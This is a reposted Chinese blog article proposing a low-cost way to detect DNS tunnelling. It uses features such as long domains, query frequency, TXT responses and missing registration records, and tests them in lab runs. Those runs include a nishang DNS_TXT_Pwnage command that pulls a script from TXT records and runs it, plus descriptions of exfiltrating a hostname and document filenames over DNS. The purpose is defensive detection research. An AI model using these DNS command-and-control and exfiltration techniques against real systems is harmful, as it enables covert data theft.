开发者社区> 桃子红了呐> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

一次误报引发的DNS检测方案的思考:DNS隧道检测平民解决方案

简介:
+关注继续查看

摘自:http://www.freebuf.com/articles/network/149328.html

 

通过以上分析得出监控需要关注的几个要素:长域名、频率、txt类型、终端是否对解析ip发起访问、是否有全域名注册记录,推导检测逻辑如下: 

方向1:特征检测:

检测窃密木马(无需更新和接收指令):     【域名超长 or 频率高】  and 【终端无进程对返回的A记录(如有)发起访问】 and 【不存在全域名注册记录】

检测远控木马(需更新和接收指令):         【域名超长 or 频率高】  and 【终端无进程对返回的A记录(如有)发起访问】 and 【不存在全域名注册记录】 and 【存在txt回包】 

通用检测(可发现单次外传,存在浏览器预解析等误报,需结合其他特征确认):

{【存在txt回包】and 【不存在全域名注册记录】}  or  {【终端无进程对返回的A记录(如有)发起访问】  and 【不存在全域名注册记录】}

方向2:基于外传量检测,发现正在进行的大量数据泄露(不分析细节,仅供参考,本次实验不涉及):

单台机器检测:    域名长度(3+N级的域名) * 域名数量(相同只计算一个) > 单台机器阈值,评测外传数据大小,达到阈值则触发报警

群体事件检测:     A机器域名长度(3+N级的域名)* A机器域名数量(相同只计算一个)  + B +…  >   多台机器阈值,评测外传数据大小,达到阈值则触发报警

 

实验验证分析:

 

为验证此方案的逻辑正确性,笔者实验如下:

 

Xshell实验验证:

 

1、直接运行xshell,触发dns行为

 

2、外传结果抓包:

 

DNS隧道检测平民解决方案

 

3、检测逻辑匹配分析:

 

a)     外传域名超长

 

b)     频率较高

 

c)     类型为TXT,有回包

 

d)     无A记录解析结果,也就无程序对结果发起访问

 

e)     不存在全域名注册记录(黑客根据算法提前注册了部分域名,但全域名无注册信息)

结论:窃密木马+远控木马

 

Powershell dns实验验证:

 

1、利用powershell构造dns隧道

 

a)     编写一个最简单的一句话脚本,获取服务列表

 

DNS隧道检测平民解决方案

 

b)     使用nishang的Out-NnsTxt将脚本GetServiceToTxt.ps1转换为txt记录

 

DNS隧道检测平民解决方案

 

c)     在dns服务器建立对应txt记录(后续执行需按照1,2,3,4的顺序,所以建立记录名为1)

 

DNS隧道检测平民解决方案

 

DNS隧道检测平民解决方案

 

验证结果,ok

 

DNS隧道检测平民解决方案

 

d)     使用nishang的DNS_TXT_Pwnage读取txt并执行(脚本自动在test.com前加1,向1.test.com请求txt记录作为脚本执行。不过笔者最终也没搞懂stopstring这个参数的原理,懂的朋友麻烦私信下,谢谢! ),可正常获取服务列表。

 

命令和结果如下:

 

DNS_TXT_Pwnage -startdomainstartflag.test.com -cmdstring nostart -commanddomain  txt1.test.com -psstring startflag -psdomain test.com -Subdomains 1 -stopstring stopflag

 

DNS隧道检测平民解决方案

 

2、外传结果抓包:

 

使用Microsoft Network Monitor抓包分析

 

DNS隧道检测平民解决方案

 

3、检测逻辑匹配分析:

 

a)     因实验未将结果外传,所以域名长度不大,如dns隧道外传则必使用长域名

 

b)     因实验未将结果外传,所以频率不高,且只获取远端的get-server功能,频率也不高,但要实现外传和获取更多功能(如mimikatz等),则必然需要高频率

 

c)     类型为TXT,有回包

 

d)     无A记录解析结果,也就无程序对结果发起访问

 

e)     此实验场景未覆盖外传数据,所以不涉及注册问题

结论:远控木马(实验功能较单一,扩展为大马则可精确覆盖检测特征)

 

利用ceye.io的外传实验验证

 

1、 少量信息窃取和大量信息窃取

 

a)     单次少量信息窃取外传,简单利用windows命令(ping、nslookup等)即可窃取机器名

 

外传实验验证

 

b)    多次大量信息窃取,编写脚本,搜索文档(word、excel、ppt),并外传文件名(此脚本360 未报警),vbs脚本内容如下 (代码未充分验证,不保证无错误,中文支持或读文件内容请自行修改):

 

2、外传结果展示:

 

 

a)     单次少量信息窃取外传

 

 

DNS隧道检测平民解决方案

 

 

b)     多次大量信息窃取

 

 

DNS隧道检测平民解决方案

 

 

3、检测逻辑匹配分析:

 

 

a)     利用A记录外传,非txt回包,长度不超长(实验原因,未充分利用域名长度),但频率较高,解析过程未发现异常(但此截图为8.8.8.8,非系统dns存在一定风险)

 

 

DNS隧道检测平民解决方案

 

 

b)     对解析A记录结果无后续访问

 

 

DNS隧道检测平民解决方案

 

 

c)     不存在全域名注册记录

 

 

结论:窃取数据木马













本文转自张昺华-sky博客园博客,原文链接:http://www.cnblogs.com/bonelee/p/7651606.html,如需转载请自行联系原作者


版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
面试阿里,腾讯,字节跳动90%都会被问到的Spring中的循环依赖
Spring中的循环依赖一直是Spring中一个很重要的话题,一方面是因为源码中为了解决循环依赖做了很多处理,另外一方面是因为面试的时候,如果问到Spring中比较高阶的问题,那么循环依赖必定逃不掉。如果你回答得好,那么这就是你的必杀技,反正,那就是面试官的必杀技,这也是取这个标题的原因,当然,本文的目的是为了让你在之后的所有面试中能多一个必杀技,专门用来绝杀面试官! 本文的主要内容就是,当面试官问:“请讲一讲Spring中的循环依赖。”的时候,我们到底该怎么回答? ps:不想听我絮叨的可以直接翻到文末查看答案
29 0
2.3Options建立配置和实体的映射「深入浅出ASP.NET Core系列」
原文:2.3Options建立配置和实体的映射「深入浅出ASP.NET Core系列」 希望给你3-5分钟的碎片化学习,可能是坐地铁、等公交,积少成多,水滴石穿,谢谢关注。 Startup.cs中创建MVC中间件   关键代码:services.AddMvc();app.UseMvcWithDefaultRoute(); 关于中间件的内部机制,后续单独专栏进行深入挖掘,此处略过。
917 0
2.3Options建立配置和实体的映射「深入浅出ASP.NET Core系列」
希望给你3-5分钟的碎片化学习,可能是坐地铁、等公交,积少成多,水滴石穿,谢谢关注。 Startup.cs中创建MVC中间件   关键代码:services.AddMvc();app.UseMvcWithDefaultRoute(); 关于中间件的内部机制,后续单独专栏进行深入挖掘,此处略过。
870 0
Finding Domain Controllers for use with WinScanX using DCLookup.exe
WinScanX Pro is only $10.00 for the month of February (normally $250.
706 0
4267
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载